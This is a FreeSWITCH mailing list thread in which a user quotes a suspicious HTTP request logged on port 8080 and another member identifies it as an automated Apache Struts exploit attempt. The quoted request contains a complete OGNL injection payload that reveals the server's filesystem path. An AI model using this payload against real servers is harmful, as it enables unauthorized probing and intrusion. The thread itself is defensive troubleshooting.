[Freeswitch-users] mystery console message
Olgierd Ziolko
lists.fs-users at uce.pw
Fri Nov 20 18:34:04 MSK 2015
Looks like [likely automatic] attempt to exploit well-known Struts
vulnerability.
Nothing to worry about - you keep Freeswitch on port well known for
presenting http-related services, you'll get more of it.
Just block all strings containing 'HTTP/1' and forget about that - Internet
is full of bots and zombies.
Best regards,
O.
On 18 November 2015 at 17:02, Russell Treleaven <rtreleaven at bunnykick.ca>
wrote:
> I saw this on the freeswitch console months ago and did not get around to
> following up on it until now.
> A freeswitch profile is listening on :8080
>
> a.b.c.d = remote address
> w.x.y.z = freeswitch address
>
> What is this?
> Is it a concern?
>
> recv 607 bytes from tcp/[a.b.c.d]:4423 at 17:50:50.225319:
> ------------------------------------------------------------------------
> POST /login.action HTTP/1.1
> User-Agent: Mozilla/5.0
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Host: w.x.y.z:8080
>
> Content-Length: 395
> Expect: 100-continue
> Connection: Keep-Alive
>
>
> redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
>
>
> _________________________________________________________________________
> Professional FreeSWITCH Consulting Services:
> consulting at freeswitch.org
> http://www.freeswitchsolutions.com
>
> Official FreeSWITCH Sites
> http://www.freeswitch.org
> http://confluence.freeswitch.org
> http://www.cluecon.com
>
> FreeSWITCH-users mailing list
> FreeSWITCH-users at lists.freeswitch.org
> http://lists.freeswitch.org/mailman/listinfo/freeswitch-users
> UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users
> http://www.freeswitch.org
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.freeswitch.org/pipermail/freeswitch-users/attachments/20151120/717918bf/attachment.html
Join us at ClueCon 2016 Aug 8-12, 2016
More information about the FreeSWITCH-users
mailing list